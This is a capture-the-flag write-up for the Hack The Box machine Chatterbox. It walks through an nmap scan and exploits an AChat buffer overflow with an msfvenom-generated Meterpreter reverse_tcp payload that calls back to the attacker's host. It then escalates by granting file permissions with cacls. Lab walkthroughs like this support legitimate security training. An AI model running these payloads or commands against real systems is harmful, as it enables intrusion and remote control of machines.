This is a write-up for the recently retired Chatterbox machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cyber security knowledge by hacking into a range of different machines.

TL;DR: Abusing CACLS. | For some strange reason, it took me far longer to recreate my steps in order to create this write-up than it did to complete the box the first-time round. I found this system particularly infuriating due to its constant resets and crashes, but despite this, I feel like I’ve still learnt a lot from it.

As always, we start with an nmap scan. Unfortunately, this revealed nothing, even when forcing all ports. I later tried to use Zenmap (which is essentially just a nmap with a GUI), which managed to return some results:

As we can see, zenmap used the following command to perform the scan:

nmap -p 1–65535 -T4 -A -v -Pn 10.10.10.74

Let’s run down the syntax here:

-p 1–65535 : This simply specifies the port range (all TCP ports).

: This simply specifies the port range (all TCP ports). -T4 : This sets the timing template to 4/5.

: This sets the timing template to 4/5. -A : This enables additional advanced and aggressive scan options.

: This enables additional advanced and aggressive scan options. -Pn: This disables the regular ping discovery stage.

Since I couldn’t connect to the AChat system through my browser or netcat, I instead went straight to searching for AChat-related exploits:

Nearly all of the results on the first page referenced the same buffer overflow exploit.

Okay, looks like we’ve got one.

The exploit-db page comes with a python script to perform the exploit, by first generating a payload with msfvenom and then finally executing it.

In the script, the following command is used to generate the payload:

msfvenom -a x86 — platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python

However this would simply be for calc.exe, rather than a reverse shell (which we want). It’s also interesting to note how many bad characters there are in this.

As such, to obtain a reverse shell, we need to change the msfvenom command, to fit our goal:

msfvenom — platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.15.102 LPORT=1337 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python

Running this in msfvenom then gives us the correct shellcode, which we can then put into the original python script.

We can then set up a Metasploit shell to listen for a connection as shown (as I learnt from here):

We can then set make the script automigrate (just to ensure persistence) with the following command:

Although this isn’t always useful, it is mandatory for this box, as I later discovered that without it, connection was consistently cut within 3 seconds.

After this has been correctly configured, we can finally run the exploit:

From here, we could navigate to the user’s desktop and obtain their flag.

Since neither the regular Metasploit Windows enumeration tool nor Pentestmonkey’s windows Priv Esc checker (found here) found anything of interest, I instead looked at the Administrator’s flag file itself, as Windows “root” flags are always in the Administrator’s Desktop folder.

After some time investigating it, it turned out that we could simply change the file’s permissions with CACLS (not ICACLS), which is described by Wikipedia as “Microsoft Windows native command line utility capable of displaying and modifying the security descriptors on folders and files”. Thus, by running “cacls root.txt /grant Alfred:F”, we can give ourselves permission (as our user was called Alfred).

Now, we can read it with “type”, and obtain the admin flag.

And with that, the box has been completed.